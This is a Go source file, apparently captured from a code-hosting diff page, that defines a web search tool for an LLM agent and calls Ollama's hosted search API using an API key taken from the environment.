// WebSearchTool implements web search using Ollama's hosted API.
|
||||
type WebSearchTool struct{}
|
||||
|
||||
// Name returns the tool name.
|
||||
func (w *WebSearchTool) Name() string {
|
||||
return "web_search"
|
||||
}
|
||||
|
||||
// Description returns a description of the tool.
|
||||
func (w *WebSearchTool) Description() string {
|
||||
return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
|
||||
}
|
||||
|
||||
// Schema returns the tool's parameter schema.
|
||||
func (w *WebSearchTool) Schema() api.ToolFunction {
|
||||
props := api.NewToolPropertiesMap()
|
||||
props.Set("query", api.ToolProperty{
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The search query to look up on the web",
|
||||
})
|
||||
return api.ToolFunction{
|
||||
Name: w.Name(),
|
||||
Description: w.Description(),
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: props,
|
||||
Required: []string{"query"},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// webSearchRequest is the request body for the web search API.
|
||||
type webSearchRequest struct {
|
||||
Query string `json:"query"`
|
||||
MaxResults int `json:"max_results,omitempty"`
|
||||
}
|
||||
|
||||
// webSearchResponse is the response from the web search API.
|
||||
type webSearchResponse struct {
|
||||
Results []webSearchResult `json:"results"`
|
||||
}
|
||||
|
||||
// webSearchResult is a single search result.
|
||||
type webSearchResult struct {
|
||||
Title string `json:"title"`
|
||||
URL string `json:"url"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
|
||||
// Execute performs the web search.
|
||||
func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
|
||||
query, ok := args["query"].(string)
|
||||
if !ok || query == "" {
|
||||
return "", fmt.Errorf("query parameter is required")
|
||||
}
|
||||
|
||||
apiKey := os.Getenv("OLLAMA_API_KEY")
|
||||
if apiKey == "" {
|
||||
return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search")
|
||||
}
|
||||
|
||||
// Prepare request
|
||||
reqBody := webSearchRequest{
|
||||
Query: query,
|
||||
MaxResults: 5,
|
||||
}
|
||||
|
||||
jsonBody, err := json.Marshal(reqBody)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("marshaling request: %w", err)
|
||||
}
|
||||
|
||||
req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody))
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("creating request: %w", err)
|
||||
}
|
||||
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
req.Header.Set("Authorization", "Bearer "+apiKey)
|
||||
|
||||
// Send request
|
||||
client := &http.Client{Timeout: webSearchTimeout}
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("sending request: %w", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
body, err := io.ReadAll(resp.Body)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("reading response: %w", err)
|
||||
}
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
|
||||
}
|
||||
|
||||
// Parse response
|
||||
var searchResp webSearchResponse
|
||||
if err := json.Unmarshal(body, &searchResp); err != nil {
|
||||
return "", fmt.Errorf("parsing response: %w", err)
|
||||
}
|
||||
|
||||
// Format results
|
||||
if len(searchResp.Results) == 0 {
|
||||
return "No results found for query: " + query, nil
|
||||
}
|
||||
|
||||
var sb strings.Builder
|
||||
sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
|
||||
|
||||
for i, result := range searchResp.Results {
|
||||
sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
|
||||
sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL))
|
||||
if result.Content != "" {
|
||||
// Truncate long content (UTF-8 safe)
|
||||
content := result.Content
|
||||
runes := []rune(content)
|
||||
if len(runes) > 300 {
|
||||
content = string(runes[:300]) + "..."
|
||||
}
|
||||
sb.WriteString(fmt.Sprintf(" %s\n", content))
|
||||
}
|
||||
sb.WriteString("\n")
|
||||
}
|
||||
|
||||
return sb.String(), nil
|
||||
}
|
||||
Loading…
Reference in New Issue